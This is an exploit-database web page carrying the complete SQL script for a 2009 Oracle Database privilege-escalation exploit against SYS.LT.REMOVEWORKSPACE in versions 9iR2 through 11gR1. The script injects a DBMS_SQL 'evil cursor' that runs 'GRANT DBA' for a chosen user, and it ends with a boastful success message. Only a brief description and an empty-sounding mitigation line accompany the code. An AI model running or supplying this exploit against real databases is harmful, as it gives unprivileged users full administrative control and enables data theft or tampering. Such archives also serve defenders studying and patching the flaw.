header-logo
Suggest Exploit
vendor:
Oracle Database
by:
Andrea 'bunker' Purificato
8.8
CVSS
HIGH
Oracle SYS.LT.REMOVEWORKSPACE exploit
264
CWE
Product Name: Oracle Database
Affected Version From: 9iR2/10gR1,10gR2,11gR1
Affected Version To: 9iR2/10gR1,10gR2,11gR1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

sys-lt-removeworkspaceV2.sql exploit

This exploit uses the evil cursor technique to grant DBA permission to an unprivileged user. It creates an evil cursor and uses the SYS.LT.CREATEWORKSPACE and SYS.LT.REMOVEWORKSPACE functions to execute the malicious code.

Mitigation:

Ensure that the SYS.LT.CREATEWORKSPACE and SYS.LT.REMOVEWORKSPACE functions are not used in any malicious way.
Source

Exploit-DB raw data:

-- 
-- sys-lt-removeworkspaceV2.sql
--
--
-- Oracle SYS.LT.REMOVEWORKSPACE exploit (9iR2/10gR1,10gR2,11gR1)
-- Evil cursor technique
--
-- Grant dba permission to unprivileged user
-- 
-- 
-- REF: http://www.google.it/search?q=SYS.LT.REMOVEWORKSPACE
-- 
-- AUTHOR: Andrea "bunker" Purificato
-- http://rawlab.mindcreations.com
--
--
set serveroutput on;
prompt [+] sys-lt-removeworkspaceV2.sql exploit
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
prompt 
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
prompt
prompt [-] Creating evil cursor...

DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction;begin execute immediate ''GRANT DBA TO &the_user'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('x''||dbms_sql.execute('||MYC||')||''--');
SYS.LT.REMOVEWORKSPACE('x''||dbms_sql.execute('||MYC||')||''--'); 
END;
/

prompt [-] YOU GOT THE POWAH!!

Navigation

Suggest Exploit

Services By CQR